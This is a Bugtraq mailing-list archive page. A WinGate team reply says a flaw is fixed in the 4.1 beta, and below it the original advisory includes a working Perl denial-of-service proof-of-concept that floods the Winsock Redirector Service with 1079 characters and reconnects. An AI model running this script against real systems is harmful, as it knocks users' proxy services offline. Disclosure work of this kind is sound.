|
Bugtraq
mailing list archives
Re: Wingate 4.0.1 denial-of-service
From: Doug Kassuba <dkassuba () I2K NET>
Date: Mon, 2 Oct 2000 18:51:34 -0000
We used your information to analyse this weakness
and it was fixed for the next release, which will be the
beta version of WinGate 4.1. This is currently
available at http://wingate.deerfield.com/beta
For normal use it is not too serious a vulnerability as
the Winsock
Redirector Service is by default only bound to the
local network adaptors
and there is no point in binding it to public (internet)
adaptors, meaning
that the attack would have to be launched from within
the LAN. GateKeeper
will warn the operator when they bind the Winsock
Redirector Service to a
public adaptor.
WinGate Development Team
======================================
===========================
Blue Panda Vulnerability Announcement: Wingate
4.0.1
02/10/2000 (dd/mm/yyyy)
bluepanda () dwarf box sk
http://bluepanda.box.sk/
======================================
===========================
Details available in attached file.
======================================
===========================
Blue Panda Vulnerability Announcement: Wingate
4.0.1
02/10/2000 (dd/mm/yyyy)
bluepanda () dwarf box sk
http://bluepanda.box.sk/
======================================
===========================
Problem: The Wingate engine can be disabled by
sending an abnormal string to
the Winsock Redirecter Service. The attack is not
logged.
Vulnerable: Wingate Home/Standard/Pro 4.0.1,
possible prior versions
(untested).
Immune: Wingate 4.1 Beta A
Vendor status: Notified.
===================
Proof of concept:
===================
#!/usr/bin/perl
#
# wgate401.pl - Wingate 4.0.1 denial-of-service
# Blue Panda - bluepanda () dwarf box sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of
concept, and
# is not intended to be used for illegal purposes. I
accept
# no responsibility for damage incurred by the use
of it.
# ----------------------------------------------------------
#
# Causes all Wingate services to become
unavailable until the Wingate Engine
# is restarted. The Winsock Redirector Service
must be enabled in order for
# this to work. Tested on the evaluation version of
Wingate Pro 4.0.1.
#
use IO::Socket;
$host = "host.com";
$port = "2080";
$sleepfor = 1;
print "Wingate 4.0.1 denial-of-service
Blue Panda - bluepanda\ () dwarf box sk
http://bluepanda.box.sk/
----------------------------------------------------------
Disclaimer: this file is intended as proof of concept,
and
is not intended to be used for illegal purposes. I
accept
no responsibility for damage incurred by the use of
it.
----------------------------------------------------------
Causes all Wingate services to become
unavailable until the Wingate Engine
is restarted. The Winsock Redirector Service must
be enabled in order for
this to work.\n\n";
# Connect to the Winsock Redirector Service.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
# Send some characters to the Winsock
Redirector Service.
$buffer = "a" x 1079;
print $socket "$buffer";
# Wait a few seconds.
$counter = 0;
print "Sleeping for $sleepfor seconds.";
while($counter < $sleepfor) {
sleep(1);
print ".";
$counter += 1;
}
print "\n";
# Close the connection. The Winsock Redirector
Service should now be
# disabled.
close($socket);
# Connect once more to the Winsock Redirector
Service. This will disable all
# other services.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
# Finished.
close($socket);
 By Date 
By Thread
Current thread:
| 
Intro
